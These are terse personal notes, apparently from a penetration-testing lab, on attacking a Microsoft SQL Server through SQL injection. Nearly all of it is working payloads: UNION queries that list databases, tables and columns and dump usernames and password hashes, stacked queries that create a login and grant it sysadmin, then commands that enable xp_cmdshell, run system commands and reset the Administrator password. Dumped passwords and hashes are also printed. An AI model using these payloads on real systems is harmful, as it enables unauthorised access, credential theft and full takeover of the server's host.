MS-SQL Notes

' ORDER BY 2--

' UNION SELECT NULL, NULL--

' UNION SELECT 'amanda', NULL--

' UNION SELECT @@version, NULL--

' UNION SELECT DB_NAME(1), NULL--   (master, tempdb, model, msdb, music,)

' UNION SELECT name, NULL FROM master ..sysdatabases-- (WHYYY)
^- displays all tables

' UNION SELECT TABLE_NAME,NULL FROM information_schema.TABLES--
(albums, concerts, singles, songs, users)

' UNION SELECT column_name,NULL FROM information_schema.COLUMNS--
(artist, id, name, pass, place, year)

' UNION SELECT name,NULL FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'users')--
(id, name, pass)

' UNION SELECT name,NULL FROM users--
(alice, brett, eric, peter)

' UNION SELECT pass,NULL FROM users--
123pass123
34819d7beeabb9260a5c854bc85b3e99
5f4dcc3b5aa765d61d8327deb882cf99
7d9264f1c1c042b799ef08da95a782d4

CREATE LOGIN amanda WITH PASSWORD = 'password'

' UNION select name, NULL from sys.server_principals--
DJ\Administrator 
dbo

SELECT name, password_hash FROM sys.sql_logins  

UNION SELECT password_hash, NULL FROM sys.sql_logins--   

' UNION SELECT name,NULL FROM syscolumns WHERE id =(SELECT id FROM sysobjects WHERE name = 'sys.server_principals')--     


Microsoft SQL Server 2012 - 11.0.2100.60 (X64) Feb 10 2012 19:39:15 Copyright (c) Microsoft Corporation Express Edition (64-bit) on Windows NT 6.2 (Build 9200: ) (Hypervisor)

' UNION SELECT @@version, NULL; CREATE LOGIN amanda WITH PASSWORD = 'password'--

IMPORTANT
' UNION SELECT @@version, NULL; EXEC sp_addlogin 'zoey', 'password'; --priv--
' UNION SELECT @@version, NULL; EXEC sp_addsrvrolemember 'zoey', 'sysadmin'; --priv--
IMPORTANT

sqsh -S 192.168.5.128 -U amanda
sp_configure 'show advanced options', '1'
go
RECONFIGURE
#this enables xp_cmdshell
sp_configure 'xp_cmdshell', '1'
go 
RECONFIGURE
# Quickly check what the service account is via xp_cmdshell
EXEC master..xp_cmdshell 'whoami'
go
EXEC master..xp_cmdshell 'net user'
go
EXEC master..xp_cmdshell 'net user Administrator password'
go